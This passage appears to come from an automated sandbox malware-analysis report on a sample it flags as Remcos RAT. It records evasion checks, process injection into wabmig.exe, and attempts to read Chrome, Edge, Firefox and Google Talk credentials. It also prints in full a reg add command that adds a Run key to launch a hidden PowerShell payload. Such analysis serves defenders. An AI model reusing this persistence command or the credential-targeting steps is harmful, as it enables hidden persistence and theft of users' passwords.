            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeAPI/Special instruction interceptor: Address: 7056739
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6064Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3714Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWindow / User API: threadDelayed 9699Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeAPI coverage: 9.5 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7140Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4676Thread sleep count: 285 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4676Thread sleep time: -855000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4676Thread sleep count: 9699 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4676Thread sleep time: -29097000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_0040595A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_00402862 FindFirstFileW,5_2_00402862
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_0040658F FindFirstFileW,FindClose,5_2_0040658F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_232310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_232310F1
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_23236580 FindFirstFileExA,12_2_23236580
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407EF8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407898
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00418981 memset,GetSystemInfo,17_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\euthanasic\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Jump to behavior
            Source: wabmig.exe, 0000000C.00000002.3760843591.0000000007719000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wabmig.exe, 0000000C.00000002.3760843591.0000000007719000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeAPI call chain: ExitProcess graph end nodegraph_5-3826
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeAPI call chain: ExitProcess graph end nodegraph_5-3831
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeAPI call chain: ExitProcess graph end nodegraph_18-34076
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_23232639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_23232639
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,17_2_004044A4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_23234AB4 mov eax, dword ptr fs:[00000030h]12_2_23234AB4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_2323724E GetProcessHeap,12_2_2323724E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_23232B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_23232B1C
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_23232639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_23232639
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_232360E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_232360E2

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wabmig.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wabmig.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wabmig.exe protection: execute and read and writeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 3C60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 5DF810Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "markedsandel" /t reg_expand_sz /d "%rykningspaategningens% -windowstyle minimized $unbaked=(get-itemproperty -path 'hkcu:\kompositioner\').batikker;%rykningspaategningens% ($unbaked)"
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "markedsandel" /t reg_expand_sz /d "%rykningspaategningens% -windowstyle minimized $unbaked=(get-itemproperty -path 'hkcu:\kompositioner\').batikker;%rykningspaategningens% ($unbaked)"Jump to behavior
            Source: wabmig.exe, 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: wabmig.exe, 0000000C.00000002.3760843591.0000000007705000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_23232933 cpuid 12_2_23232933
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_23232264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_23232264
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,18_2_004082CD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040333D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 3200, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Instant Messenger accounts or passwords
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
